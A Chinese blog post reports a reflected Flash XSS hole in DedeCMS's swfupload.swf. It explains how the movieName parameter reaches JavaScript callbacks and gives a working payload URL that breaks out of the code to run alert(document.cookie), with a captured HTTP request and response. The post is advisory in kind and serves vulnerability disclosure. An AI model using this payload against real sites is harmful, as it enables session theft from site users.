大雕哥
你身边最懂互联网的朋友

织梦DEDECMS Flash XSS漏洞

漏洞类型
DEDECMS Flash XSS漏洞

漏洞危害
XSS可导致黑客盗取用户登陆后的验证信息,从而使得黑客可以伪装为用户进行登陆。

漏洞说明
从参数(root.loaderInfo.parameters.movieName)中获得movieName后直接赋值到一些callback响应函数中,这些函数是js中执行的内容。我们只需闭合前面的"],再闭合try..catch中大括号},即可执行自己的javascript代码,造成反射型XSS。

漏洞详情
Detail:***/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}// flash xss
response:{"header":"HTTP/1.1 200 OK
Date: Sun, 27 May 2018 09:35:43 GMT
Content-Type: application/x-shockwave-flash
Content-Length: 12787
Connection: keep-alive
Last-Modified: Fri, 01 Jul 2011 08:14:24 GMT
ETag: \"0b018e3c637cc1:0\"
X-Powered-By: ASP.NET
CF-Cache-Status: HIT
Vary: Accept-Encoding
Expires: Sun, 27 May 2018 13:35:43 GMT
Cache-Control: public, max-age=14400
Accept-Ranges: bytes
Expect-CT: max-age=604800, report-uri=\"https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct\"
Server: yunjiasu-nginx
CF-RAY: 42177e383dd64394-SZV
"}
request:{"body":"","header":"GET /images/swfupload/swfupload.swf HTTP/1.1
Cookie: __cfduid=d28ed3db086fbe83a2dd36ca20d26d3c01527413742
Host: ***
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
"}
target:"***/images/swfupload/swfupload.swf"
url:***/images/swfupload/swfupload.swf

修复建议

温馨提示: 隐藏内容需要 回复评论 后才能查看, 评论后请 刷新 !.

赞(0) 解决问题,就是我最大的快乐
转载请保留出处:大雕哥 » 织梦DEDECMS Flash XSS漏洞
分享到: 更多 (0)

评论 4

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
  1. #-9

    公众号活动转发到朋友圈别人看不到只有自己能看到的问题-大雕哥公众号活动转发到朋友圈别人看不到只有自己能看到的问题 朋友圈转发传播被屏蔽限制了

    ddsda5个月前 (06-28)回复
  2. #-8

    看看怎么处理的,谢谢!~

    答复按多少4周前 (10-21)回复
  3. #-7

    查看处理方法,谢谢!

    查看3周前 (10-29)回复
  4. #-6

    看看怎么处理的,谢谢!

    谢谢3周前 (10-30)回复

大雕哥,做你身边最懂互联网的朋友

邮箱订阅联系我们

如果觉得文章有用可以打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏